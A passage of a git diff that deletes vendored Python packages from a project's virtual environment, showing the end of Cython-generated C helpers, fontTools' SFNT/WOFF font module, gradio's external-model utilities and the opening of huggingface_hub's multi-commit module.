defined(PyByteArray_GET_SIZE)) - if (PyByteArray_Check(o)) { - *length = PyByteArray_GET_SIZE(o); - return PyByteArray_AS_STRING(o); - } else -#endif - { - char* result; - int r = PyBytes_AsStringAndSize(o, &result, length); - if (unlikely(r < 0)) { - return NULL; - } else { - return result; - } - } -} -static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject* x) { - int is_true = x == Py_True; - if (is_true | (x == Py_False) | (x == Py_None)) return is_true; - else return PyObject_IsTrue(x); -} -static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject* x) { - int retval; - if (unlikely(!x)) return -1; - retval = __Pyx_PyObject_IsTrue(x); - Py_DECREF(x); - return retval; -} -static PyObject* __Pyx_PyNumber_IntOrLongWrongResultType(PyObject* result, const char* type_name) { - __Pyx_TypeName result_type_name = __Pyx_PyType_GetName(Py_TYPE(result)); -#if PY_MAJOR_VERSION >= 3 - if (PyLong_Check(result)) { - if (PyErr_WarnFormat(PyExc_DeprecationWarning, 1, - "__int__ returned non-int (type " __Pyx_FMT_TYPENAME "). 
" - "The ability to return an instance of a strict subclass of int is deprecated, " - "and may be removed in a future version of Python.", - result_type_name)) { - __Pyx_DECREF_TypeName(result_type_name); - Py_DECREF(result); - return NULL; - } - __Pyx_DECREF_TypeName(result_type_name); - return result; - } -#endif - PyErr_Format(PyExc_TypeError, - "__%.4s__ returned non-%.4s (type " __Pyx_FMT_TYPENAME ")", - type_name, type_name, result_type_name); - __Pyx_DECREF_TypeName(result_type_name); - Py_DECREF(result); - return NULL; -} -static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x) { -#if CYTHON_USE_TYPE_SLOTS - PyNumberMethods *m; -#endif - const char *name = NULL; - PyObject *res = NULL; -#if PY_MAJOR_VERSION < 3 - if (likely(PyInt_Check(x) || PyLong_Check(x))) -#else - if (likely(PyLong_Check(x))) -#endif - return __Pyx_NewRef(x); -#if CYTHON_USE_TYPE_SLOTS - m = Py_TYPE(x)->tp_as_number; - #if PY_MAJOR_VERSION < 3 - if (m && m->nb_int) { - name = "int"; - res = m->nb_int(x); - } - else if (m && m->nb_long) { - name = "long"; - res = m->nb_long(x); - } - #else - if (likely(m && m->nb_int)) { - name = "int"; - res = m->nb_int(x); - } - #endif -#else - if (!PyBytes_CheckExact(x) && !PyUnicode_CheckExact(x)) { - res = PyNumber_Int(x); - } -#endif - if (likely(res)) { -#if PY_MAJOR_VERSION < 3 - if (unlikely(!PyInt_Check(res) && !PyLong_Check(res))) { -#else - if (unlikely(!PyLong_CheckExact(res))) { -#endif - return __Pyx_PyNumber_IntOrLongWrongResultType(res, name); - } - } - else if (!PyErr_Occurred()) { - PyErr_SetString(PyExc_TypeError, - "an integer is required"); - } - return res; -} -static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject* b) { - Py_ssize_t ival; - PyObject *x; -#if PY_MAJOR_VERSION < 3 - if (likely(PyInt_CheckExact(b))) { - if (sizeof(Py_ssize_t) >= sizeof(long)) - return PyInt_AS_LONG(b); - else - return PyInt_AsSsize_t(b); - } -#endif - if (likely(PyLong_CheckExact(b))) { - #if CYTHON_USE_PYLONG_INTERNALS - if 
(likely(__Pyx_PyLong_IsCompact(b))) { - return __Pyx_PyLong_CompactValue(b); - } else { - const digit* digits = __Pyx_PyLong_Digits(b); - const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(b); - switch (size) { - case 2: - if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { - return (Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); - } - break; - case -2: - if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { - return -(Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); - } - break; - case 3: - if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { - return (Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); - } - break; - case -3: - if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { - return -(Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); - } - break; - case 4: - if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { - return (Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); - } - break; - case -4: - if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { - return -(Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); - } - break; - } - } - #endif - return PyLong_AsSsize_t(b); - } - x = PyNumber_Index(b); - if (!x) return -1; - ival = PyInt_AsSsize_t(x); - Py_DECREF(x); - return ival; -} -static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject* o) { - if (sizeof(Py_hash_t) == sizeof(Py_ssize_t)) { - return (Py_hash_t) __Pyx_PyIndex_AsSsize_t(o); -#if PY_MAJOR_VERSION < 3 - } else if (likely(PyInt_CheckExact(o))) { - return PyInt_AS_LONG(o); -#endif - } else { - Py_ssize_t ival; - PyObject *x; - x = PyNumber_Index(o); - if (!x) return -1; - ival = PyInt_AsLong(x); - Py_DECREF(x); - return ival; - } 
-} -static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b) { - return b ? __Pyx_NewRef(Py_True) : __Pyx_NewRef(Py_False); -} -static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t ival) { - return PyInt_FromSize_t(ival); -} - - -/* #### Code section: utility_code_pragmas_end ### */ -#ifdef _MSC_VER -#pragma warning( pop ) -#endif - - - -/* #### Code section: end ### */ -#endif /* Py_PYTHON_H */ diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/fontTools/ttLib/sfnt.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/fontTools/ttLib/sfnt.py deleted file mode 100644 index 354fb85ea2fa33c93884ca5ef725ac99d9efcdb8..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/fontTools/ttLib/sfnt.py +++ /dev/null @@ -1,664 +0,0 @@ -"""ttLib/sfnt.py -- low-level module to deal with the sfnt file format. - -Defines two public classes: - SFNTReader - SFNTWriter - -(Normally you don't have to use these classes explicitly; they are -used automatically by ttLib.TTFont.) - -The reading and writing of sfnt files is separated in two distinct -classes, since whenever the number of tables changes or whenever -a table's length changes you need to rewrite the whole file anyway. -""" - -from io import BytesIO -from types import SimpleNamespace -from fontTools.misc.textTools import Tag -from fontTools.misc import sstruct -from fontTools.ttLib import TTLibError, TTLibFileIsCollectionError -import struct -from collections import OrderedDict -import logging - - -log = logging.getLogger(__name__) - - -class SFNTReader(object): - def __new__(cls, *args, **kwargs): - """Return an instance of the SFNTReader sub-class which is compatible - with the input file type. 
- """ - if args and cls is SFNTReader: - infile = args[0] - infile.seek(0) - sfntVersion = Tag(infile.read(4)) - infile.seek(0) - if sfntVersion == "wOF2": - # return new WOFF2Reader object - from fontTools.ttLib.woff2 import WOFF2Reader - - return object.__new__(WOFF2Reader) - # return default object - return object.__new__(cls) - - def __init__(self, file, checkChecksums=0, fontNumber=-1): - self.file = file - self.checkChecksums = checkChecksums - - self.flavor = None - self.flavorData = None - self.DirectoryEntry = SFNTDirectoryEntry - self.file.seek(0) - self.sfntVersion = self.file.read(4) - self.file.seek(0) - if self.sfntVersion == b"ttcf": - header = readTTCHeader(self.file) - numFonts = header.numFonts - if not 0 <= fontNumber < numFonts: - raise TTLibFileIsCollectionError( - "specify a font number between 0 and %d (inclusive)" - % (numFonts - 1) - ) - self.numFonts = numFonts - self.file.seek(header.offsetTable[fontNumber]) - data = self.file.read(sfntDirectorySize) - if len(data) != sfntDirectorySize: - raise TTLibError("Not a Font Collection (not enough data)") - sstruct.unpack(sfntDirectoryFormat, data, self) - elif self.sfntVersion == b"wOFF": - self.flavor = "woff" - self.DirectoryEntry = WOFFDirectoryEntry - data = self.file.read(woffDirectorySize) - if len(data) != woffDirectorySize: - raise TTLibError("Not a WOFF font (not enough data)") - sstruct.unpack(woffDirectoryFormat, data, self) - else: - data = self.file.read(sfntDirectorySize) - if len(data) != sfntDirectorySize: - raise TTLibError("Not a TrueType or OpenType font (not enough data)") - sstruct.unpack(sfntDirectoryFormat, data, self) - self.sfntVersion = Tag(self.sfntVersion) - - if self.sfntVersion not in ("\x00\x01\x00\x00", "OTTO", "true"): - raise TTLibError("Not a TrueType or OpenType font (bad sfntVersion)") - tables = {} - for i in range(self.numTables): - entry = self.DirectoryEntry() - entry.fromFile(self.file) - tag = Tag(entry.tag) - tables[tag] = entry - self.tables = 
OrderedDict(sorted(tables.items(), key=lambda i: i[1].offset)) - - # Load flavor data if any - if self.flavor == "woff": - self.flavorData = WOFFFlavorData(self) - - def has_key(self, tag): - return tag in self.tables - - __contains__ = has_key - - def keys(self): - return self.tables.keys() - - def __getitem__(self, tag): - """Fetch the raw table data.""" - entry = self.tables[Tag(tag)] - data = entry.loadData(self.file) - if self.checkChecksums: - if tag == "head": - # Beh: we have to special-case the 'head' table. - checksum = calcChecksum(data[:8] + b"\0\0\0\0" + data[12:]) - else: - checksum = calcChecksum(data) - if self.checkChecksums > 1: - # Be obnoxious, and barf when it's wrong - assert checksum == entry.checkSum, "bad checksum for '%s' table" % tag - elif checksum != entry.checkSum: - # Be friendly, and just log a warning. - log.warning("bad checksum for '%s' table", tag) - return data - - def __delitem__(self, tag): - del self.tables[Tag(tag)] - - def close(self): - self.file.close() - - # We define custom __getstate__ and __setstate__ to make SFNTReader pickle-able - # and deepcopy-able. When a TTFont is loaded as lazy=True, SFNTReader holds a - # reference to an external file object which is not pickleable. So in __getstate__ - # we store the file name and current position, and in __setstate__ we reopen the - # same named file after unpickling. 
- - def __getstate__(self): - if isinstance(self.file, BytesIO): - # BytesIO is already pickleable, return the state unmodified - return self.__dict__ - - # remove unpickleable file attribute, and only store its name and pos - state = self.__dict__.copy() - del state["file"] - state["_filename"] = self.file.name - state["_filepos"] = self.file.tell() - return state - - def __setstate__(self, state): - if "file" not in state: - self.file = open(state.pop("_filename"), "rb") - self.file.seek(state.pop("_filepos")) - self.__dict__.update(state) - - -# default compression level for WOFF 1.0 tables and metadata -ZLIB_COMPRESSION_LEVEL = 6 - -# if set to True, use zopfli instead of zlib for compressing WOFF 1.0. -# The Python bindings are available at https://pypi.python.org/pypi/zopfli -USE_ZOPFLI = False - -# mapping between zlib's compression levels and zopfli's 'numiterations'. -# Use lower values for files over several MB in size or it will be too slow -ZOPFLI_LEVELS = { - # 0: 0, # can't do 0 iterations... - 1: 1, - 2: 3, - 3: 5, - 4: 8, - 5: 10, - 6: 15, - 7: 25, - 8: 50, - 9: 100, -} - - -def compress(data, level=ZLIB_COMPRESSION_LEVEL): - """Compress 'data' to Zlib format. If 'USE_ZOPFLI' variable is True, - zopfli is used instead of the zlib module. - The compression 'level' must be between 0 and 9. 1 gives best speed, - 9 gives best compression (0 gives no compression at all). - The default value is a compromise between speed and compression (6). - """ - if not (0 <= level <= 9): - raise ValueError("Bad compression level: %s" % level) - if not USE_ZOPFLI or level == 0: - from zlib import compress - - return compress(data, level) - else: - from zopfli.zlib import compress - - return compress(data, numiterations=ZOPFLI_LEVELS[level]) - - -class SFNTWriter(object): - def __new__(cls, *args, **kwargs): - """Return an instance of the SFNTWriter sub-class which is compatible - with the specified 'flavor'. 
- """ - flavor = None - if kwargs and "flavor" in kwargs: - flavor = kwargs["flavor"] - elif args and len(args) > 3: - flavor = args[3] - if cls is SFNTWriter: - if flavor == "woff2": - # return new WOFF2Writer object - from fontTools.ttLib.woff2 import WOFF2Writer - - return object.__new__(WOFF2Writer) - # return default object - return object.__new__(cls) - - def __init__( - self, - file, - numTables, - sfntVersion="\000\001\000\000", - flavor=None, - flavorData=None, - ): - self.file = file - self.numTables = numTables - self.sfntVersion = Tag(sfntVersion) - self.flavor = flavor - self.flavorData = flavorData - - if self.flavor == "woff": - self.directoryFormat = woffDirectoryFormat - self.directorySize = woffDirectorySize - self.DirectoryEntry = WOFFDirectoryEntry - - self.signature = "wOFF" - - # to calculate WOFF checksum adjustment, we also need the original SFNT offsets - self.origNextTableOffset = ( - sfntDirectorySize + numTables * sfntDirectoryEntrySize - ) - else: - assert not self.flavor, "Unknown flavor '%s'" % self.flavor - self.directoryFormat = sfntDirectoryFormat - self.directorySize = sfntDirectorySize - self.DirectoryEntry = SFNTDirectoryEntry - - from fontTools.ttLib import getSearchRange - - self.searchRange, self.entrySelector, self.rangeShift = getSearchRange( - numTables, 16 - ) - - self.directoryOffset = self.file.tell() - self.nextTableOffset = ( - self.directoryOffset - + self.directorySize - + numTables * self.DirectoryEntry.formatSize - ) - # clear out directory area - self.file.seek(self.nextTableOffset) - # make sure we're actually where we want to be. 
(old cStringIO bug) - self.file.write(b"\0" * (self.nextTableOffset - self.file.tell())) - self.tables = OrderedDict() - - def setEntry(self, tag, entry): - if tag in self.tables: - raise TTLibError("cannot rewrite '%s' table" % tag) - - self.tables[tag] = entry - - def __setitem__(self, tag, data): - """Write raw table data to disk.""" - if tag in self.tables: - raise TTLibError("cannot rewrite '%s' table" % tag) - - entry = self.DirectoryEntry() - entry.tag = tag - entry.offset = self.nextTableOffset - if tag == "head": - entry.checkSum = calcChecksum(data[:8] + b"\0\0\0\0" + data[12:]) - self.headTable = data - entry.uncompressed = True - else: - entry.checkSum = calcChecksum(data) - entry.saveData(self.file, data) - - if self.flavor == "woff": - entry.origOffset = self.origNextTableOffset - self.origNextTableOffset += (entry.origLength + 3) & ~3 - - self.nextTableOffset = self.nextTableOffset + ((entry.length + 3) & ~3) - # Add NUL bytes to pad the table data to a 4-byte boundary. - # Don't depend on f.seek() as we need to add the padding even if no - # subsequent write follows (seek is lazy), ie. after the final table - # in the font. - self.file.write(b"\0" * (self.nextTableOffset - self.file.tell())) - assert self.nextTableOffset == self.file.tell() - - self.setEntry(tag, entry) - - def __getitem__(self, tag): - return self.tables[tag] - - def close(self): - """All tables must have been written to disk. Now write the - directory. 
- """ - tables = sorted(self.tables.items()) - if len(tables) != self.numTables: - raise TTLibError( - "wrong number of tables; expected %d, found %d" - % (self.numTables, len(tables)) - ) - - if self.flavor == "woff": - self.signature = b"wOFF" - self.reserved = 0 - - self.totalSfntSize = 12 - self.totalSfntSize += 16 * len(tables) - for tag, entry in tables: - self.totalSfntSize += (entry.origLength + 3) & ~3 - - data = self.flavorData if self.flavorData else WOFFFlavorData() - if data.majorVersion is not None and data.minorVersion is not None: - self.majorVersion = data.majorVersion - self.minorVersion = data.minorVersion - else: - if hasattr(self, "headTable"): - self.majorVersion, self.minorVersion = struct.unpack( - ">HH", self.headTable[4:8] - ) - else: - self.majorVersion = self.minorVersion = 0 - if data.metaData: - self.metaOrigLength = len(data.metaData) - self.file.seek(0, 2) - self.metaOffset = self.file.tell() - compressedMetaData = compress(data.metaData) - self.metaLength = len(compressedMetaData) - self.file.write(compressedMetaData) - else: - self.metaOffset = self.metaLength = self.metaOrigLength = 0 - if data.privData: - self.file.seek(0, 2) - off = self.file.tell() - paddedOff = (off + 3) & ~3 - self.file.write(b"\0" * (paddedOff - off)) - self.privOffset = self.file.tell() - self.privLength = len(data.privData) - self.file.write(data.privData) - else: - self.privOffset = self.privLength = 0 - - self.file.seek(0, 2) - self.length = self.file.tell() - - else: - assert not self.flavor, "Unknown flavor '%s'" % self.flavor - pass - - directory = sstruct.pack(self.directoryFormat, self) - - self.file.seek(self.directoryOffset + self.directorySize) - seenHead = 0 - for tag, entry in tables: - if tag == "head": - seenHead = 1 - directory = directory + entry.toString() - if seenHead: - self.writeMasterChecksum(directory) - self.file.seek(self.directoryOffset) - self.file.write(directory) - - def _calcMasterChecksum(self, directory): - # calculate 
checkSumAdjustment - tags = list(self.tables.keys()) - checksums = [] - for i in range(len(tags)): - checksums.append(self.tables[tags[i]].checkSum) - - if self.DirectoryEntry != SFNTDirectoryEntry: - # Create a SFNT directory for checksum calculation purposes - from fontTools.ttLib import getSearchRange - - self.searchRange, self.entrySelector, self.rangeShift = getSearchRange( - self.numTables, 16 - ) - directory = sstruct.pack(sfntDirectoryFormat, self) - tables = sorted(self.tables.items()) - for tag, entry in tables: - sfntEntry = SFNTDirectoryEntry() - sfntEntry.tag = entry.tag - sfntEntry.checkSum = entry.checkSum - sfntEntry.offset = entry.origOffset - sfntEntry.length = entry.origLength - directory = directory + sfntEntry.toString() - - directory_end = sfntDirectorySize + len(self.tables) * sfntDirectoryEntrySize - assert directory_end == len(directory) - - checksums.append(calcChecksum(directory)) - checksum = sum(checksums) & 0xFFFFFFFF - # BiboAfba! - checksumadjustment = (0xB1B0AFBA - checksum) & 0xFFFFFFFF - return checksumadjustment - - def writeMasterChecksum(self, directory): - checksumadjustment = self._calcMasterChecksum(directory) - # write the checksum to the file - self.file.seek(self.tables["head"].offset + 8) - self.file.write(struct.pack(">L", checksumadjustment)) - - def reordersTables(self): - return False - - -# -- sfnt directory helpers and cruft - -ttcHeaderFormat = """ - > # big endian - TTCTag: 4s # "ttcf" - Version: L # 0x00010000 or 0x00020000 - numFonts: L # number of fonts - # OffsetTable[numFonts]: L # array with offsets from beginning of file - # ulDsigTag: L # version 2.0 only - # ulDsigLength: L # version 2.0 only - # ulDsigOffset: L # version 2.0 only -""" - -ttcHeaderSize = sstruct.calcsize(ttcHeaderFormat) - -sfntDirectoryFormat = """ - > # big endian - sfntVersion: 4s - numTables: H # number of tables - searchRange: H # (max2 <= numTables)*16 - entrySelector: H # log2(max2 <= numTables) - rangeShift: H # 
numTables*16-searchRange -""" - -sfntDirectorySize = sstruct.calcsize(sfntDirectoryFormat) - -sfntDirectoryEntryFormat = """ - > # big endian - tag: 4s - checkSum: L - offset: L - length: L -""" - -sfntDirectoryEntrySize = sstruct.calcsize(sfntDirectoryEntryFormat) - -woffDirectoryFormat = """ - > # big endian - signature: 4s # "wOFF" - sfntVersion: 4s - length: L # total woff file size - numTables: H # number of tables - reserved: H # set to 0 - totalSfntSize: L # uncompressed size - majorVersion: H # major version of WOFF file - minorVersion: H # minor version of WOFF file - metaOffset: L # offset to metadata block - metaLength: L # length of compressed metadata - metaOrigLength: L # length of uncompressed metadata - privOffset: L # offset to private data block - privLength: L # length of private data block -""" - -woffDirectorySize = sstruct.calcsize(woffDirectoryFormat) - -woffDirectoryEntryFormat = """ - > # big endian - tag: 4s - offset: L - length: L # compressed length - origLength: L # original length - checkSum: L # original checksum -""" - -woffDirectoryEntrySize = sstruct.calcsize(woffDirectoryEntryFormat) - - -class DirectoryEntry(object): - def __init__(self): - self.uncompressed = False # if True, always embed entry raw - - def fromFile(self, file): - sstruct.unpack(self.format, file.read(self.formatSize), self) - - def fromString(self, str): - sstruct.unpack(self.format, str, self) - - def toString(self): - return sstruct.pack(self.format, self) - - def __repr__(self): - if hasattr(self, "tag"): - return "<%s '%s' at %x>" % (self.__class__.__name__, self.tag, id(self)) - else: - return "<%s at %x>" % (self.__class__.__name__, id(self)) - - def loadData(self, file): - file.seek(self.offset) - data = file.read(self.length) - assert len(data) == self.length - if hasattr(self.__class__, "decodeData"): - data = self.decodeData(data) - return data - - def saveData(self, file, data): - if hasattr(self.__class__, "encodeData"): - data = 
self.encodeData(data) - self.length = len(data) - file.seek(self.offset) - file.write(data) - - def decodeData(self, rawData): - return rawData - - def encodeData(self, data): - return data - - -class SFNTDirectoryEntry(DirectoryEntry): - - format = sfntDirectoryEntryFormat - formatSize = sfntDirectoryEntrySize - - -class WOFFDirectoryEntry(DirectoryEntry): - - format = woffDirectoryEntryFormat - formatSize = woffDirectoryEntrySize - - def __init__(self): - super(WOFFDirectoryEntry, self).__init__() - # With fonttools<=3.1.2, the only way to set a different zlib - # compression level for WOFF directory entries was to set the class - # attribute 'zlibCompressionLevel'. This is now replaced by a globally - # defined `ZLIB_COMPRESSION_LEVEL`, which is also applied when - # compressing the metadata. For backward compatibility, we still - # use the class attribute if it was already set. - if not hasattr(WOFFDirectoryEntry, "zlibCompressionLevel"): - self.zlibCompressionLevel = ZLIB_COMPRESSION_LEVEL - - def decodeData(self, rawData): - import zlib - - if self.length == self.origLength: - data = rawData - else: - assert self.length < self.origLength - data = zlib.decompress(rawData) - assert len(data) == self.origLength - return data - - def encodeData(self, data): - self.origLength = len(data) - if not self.uncompressed: - compressedData = compress(data, self.zlibCompressionLevel) - if self.uncompressed or len(compressedData) >= self.origLength: - # Encode uncompressed - rawData = data - self.length = self.origLength - else: - rawData = compressedData - self.length = len(rawData) - return rawData - - -class WOFFFlavorData: - - Flavor = "woff" - - def __init__(self, reader=None): - self.majorVersion = None - self.minorVersion = None - self.metaData = None - self.privData = None - if reader: - self.majorVersion = reader.majorVersion - self.minorVersion = reader.minorVersion - if reader.metaLength: - reader.file.seek(reader.metaOffset) - rawData = 
reader.file.read(reader.metaLength) - assert len(rawData) == reader.metaLength - data = self._decompress(rawData) - assert len(data) == reader.metaOrigLength - self.metaData = data - if reader.privLength: - reader.file.seek(reader.privOffset) - data = reader.file.read(reader.privLength) - assert len(data) == reader.privLength - self.privData = data - - def _decompress(self, rawData): - import zlib - - return zlib.decompress(rawData) - - -def calcChecksum(data): - """Calculate the checksum for an arbitrary block of data. - - If the data length is not a multiple of four, it assumes - it is to be padded with null byte. - - >>> print(calcChecksum(b"abcd")) - 1633837924 - >>> print(calcChecksum(b"abcdxyz")) - 3655064932 - """ - remainder = len(data) % 4 - if remainder: - data += b"\0" * (4 - remainder) - value = 0 - blockSize = 4096 - assert blockSize % 4 == 0 - for i in range(0, len(data), blockSize): - block = data[i : i + blockSize] - longs = struct.unpack(">%dL" % (len(block) // 4), block) - value = (value + sum(longs)) & 0xFFFFFFFF - return value - - -def readTTCHeader(file): - file.seek(0) - data = file.read(ttcHeaderSize) - if len(data) != ttcHeaderSize: - raise TTLibError("Not a Font Collection (not enough data)") - self = SimpleNamespace() - sstruct.unpack(ttcHeaderFormat, data, self) - if self.TTCTag != "ttcf": - raise TTLibError("Not a Font Collection") - assert self.Version == 0x00010000 or self.Version == 0x00020000, ( - "unrecognized TTC version 0x%08x" % self.Version - ) - self.offsetTable = struct.unpack( - ">%dL" % self.numFonts, file.read(self.numFonts * 4) - ) - if self.Version == 0x00020000: - pass # ignoring version 2.0 signatures - return self - - -def writeTTCHeader(file, numFonts): - self = SimpleNamespace() - self.TTCTag = "ttcf" - self.Version = 0x00010000 - self.numFonts = numFonts - file.seek(0) - file.write(sstruct.pack(ttcHeaderFormat, self)) - offset = file.tell() - file.write(struct.pack(">%dL" % self.numFonts, *([0] * self.numFonts))) - 
return offset - - -if __name__ == "__main__": - import sys - import doctest - - sys.exit(doctest.testmod().failed) diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/gradio/external_utils.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/gradio/external_utils.py deleted file mode 100644 index 9a6064bd25da68c51ee9b09f3551e2a31fdb253b..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/gradio/external_utils.py +++ /dev/null @@ -1,140 +0,0 @@ -"""Utility function for gradio/external.py""" - -import base64 -import math -import operator -import re -import warnings -from typing import Dict, List, Tuple - -import requests -import yaml - -from gradio import components - -################## -# Helper functions for processing tabular data -################## - - -def get_tabular_examples(model_name: str) -> Dict[str, List[float]]: - readme = requests.get(f"https://huggingface.co/{model_name}/resolve/main/README.md") - if readme.status_code != 200: - warnings.warn(f"Cannot load examples from README for {model_name}", UserWarning) - example_data = {} - else: - yaml_regex = re.search( - "(?:^|[\r\n])---[\n\r]+([\\S\\s]*?)[\n\r]+---([\n\r]|$)", readme.text - ) - if yaml_regex is None: - example_data = {} - else: - example_yaml = next( - yaml.safe_load_all(readme.text[: yaml_regex.span()[-1]]) - ) - example_data = example_yaml.get("widget", {}).get("structuredData", {}) - if not example_data: - raise ValueError( - f"No example data found in README.md of {model_name} - Cannot build gradio demo. " - "See the README.md here: https://huggingface.co/scikit-learn/tabular-playground/blob/main/README.md " - "for a reference on how to provide example data to your model." 
- ) - # replace nan with string NaN for inference API - for data in example_data.values(): - for i, val in enumerate(data): - if isinstance(val, float) and math.isnan(val): - data[i] = "NaN" - return example_data - - -def cols_to_rows( - example_data: Dict[str, List[float]] -) -> Tuple[List[str], List[List[float]]]: - headers = list(example_data.keys()) - n_rows = max(len(example_data[header] or []) for header in headers) - data = [] - for row_index in range(n_rows): - row_data = [] - for header in headers: - col = example_data[header] or [] - if row_index >= len(col): - row_data.append("NaN") - else: - row_data.append(col[row_index]) - data.append(row_data) - return headers, data - - -def rows_to_cols(incoming_data: Dict) -> Dict[str, Dict[str, Dict[str, List[str]]]]: - data_column_wise = {} - for i, header in enumerate(incoming_data["headers"]): - data_column_wise[header] = [str(row[i]) for row in incoming_data["data"]] - return {"inputs": {"data": data_column_wise}} - - -################## -# Helper functions for processing other kinds of data -################## - - -def postprocess_label(scores: Dict) -> Dict: - sorted_pred = sorted(scores.items(), key=operator.itemgetter(1), reverse=True) - return { - "label": sorted_pred[0][0], - "confidences": [ - {"label": pred[0], "confidence": pred[1]} for pred in sorted_pred - ], - } - - -def encode_to_base64(r: requests.Response) -> str: - # Handles the different ways HF API returns the prediction - base64_repr = base64.b64encode(r.content).decode("utf-8") - data_prefix = ";base64," - # Case 1: base64 representation already includes data prefix - if data_prefix in base64_repr: - return base64_repr - else: - content_type = r.headers.get("content-type") - # Case 2: the data prefix is a key in the response - if content_type == "application/json": - try: - data = r.json()[0] - content_type = data["content-type"] - base64_repr = data["blob"] - except KeyError as ke: - raise ValueError( - "Cannot determine content type 
returned by external API." - ) from ke - # Case 3: the data prefix is included in the response headers - else: - pass - new_base64 = f"data:{content_type};base64,{base64_repr}" - return new_base64 - - -################## -# Helper function for cleaning up an Interface loaded from HF Spaces -################## - - -def streamline_spaces_interface(config: Dict) -> Dict: - """Streamlines the interface config dictionary to remove unnecessary keys.""" - config["inputs"] = [ - components.get_component_instance(component) - for component in config["input_components"] - ] - config["outputs"] = [ - components.get_component_instance(component) - for component in config["output_components"] - ] - parameters = { - "article", - "description", - "flagging_options", - "inputs", - "outputs", - "title", - } - config = {k: config[k] for k in parameters} - return config diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/huggingface_hub/_multi_commits.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/huggingface_hub/_multi_commits.py deleted file mode 100644 index c41d2a36fc0971ad031e05d851e632b263f10e48..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/huggingface_hub/_multi_commits.py +++ /dev/null @@ -1,305 +0,0 @@ -# coding=utf-8 -# Copyright 2023-present, the HuggingFace Inc. team. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -"""Contains utilities to multi-commits (i.e. 
push changes iteratively on a PR).""" -import re -from dataclasses import dataclass, field -from hashlib import sha256 -from typing import TYPE_CHECKING, Iterable, List, Optional, Set, Tuple, Union - -from ._commit_api import CommitOperationAdd, CommitOperationDelete -from .community import DiscussionWithDetails -from .utils import experimental -from .utils._cache_manager import _format_size - - -if TYPE_CHECKING: - from .hf_api import HfApi - - -class MultiCommitException(Exception): - """Base exception for any exception happening while doing a multi-commit.""" - - -MULTI_COMMIT_PR_DESCRIPTION_TEMPLATE = """ -## {commit_message} - -{commit_description} - -**Multi commit ID:** {multi_commit_id} - -Scheduled commits: - -{multi_commit_strategy} - -_This is a PR opened using the `huggingface_hub` library in the context of a multi-commit. PR can be commented as a usual PR. However, please be aware that manually updating the PR description, changing the PR status, or pushing new commits, is not recommended as it might corrupt the commit process. Learn more about multi-commits [in this guide](https://huggingface.co/docs/huggingface_hub/main/guides/upload)._ -""" - -MULTI_COMMIT_PR_COMPLETION_COMMENT_TEMPLATE = """ -Multi-commit is now completed! You can ping the repo owner to review the changes. This PR can now be commented or modified without risking to corrupt it. - -_This is a comment posted using the `huggingface_hub` library in the context of a multi-commit. Learn more about multi-commits [in this guide](https://huggingface.co/docs/huggingface_hub/main/guides/upload)._ -""" - -MULTI_COMMIT_PR_CLOSING_COMMENT_TEMPLATE = """ -`create_pr=False` has been passed so PR is automatically merged. - -_This is a comment posted using the `huggingface_hub` library in the context of a multi-commit. 
